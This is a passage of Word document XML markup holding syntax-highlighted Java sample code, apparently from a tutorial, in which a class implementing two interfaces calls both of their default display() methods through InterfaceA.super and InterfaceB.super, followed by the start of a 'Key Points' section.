      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F4402" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterfaceA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterfaceB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7930D325" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61212B26" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> display</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5081429F" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Calling both the interface default methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5A43C" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterfaceA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>display</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DA3670" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterfaceB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>display</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536739B5" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1DB87C" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213B3DD2" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BF73C8" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C9BF55" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        obj</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>display</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// This will call both methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBE0D80" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423FA97A" w14:textId="06C5B158" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725F0891" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D897F0" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
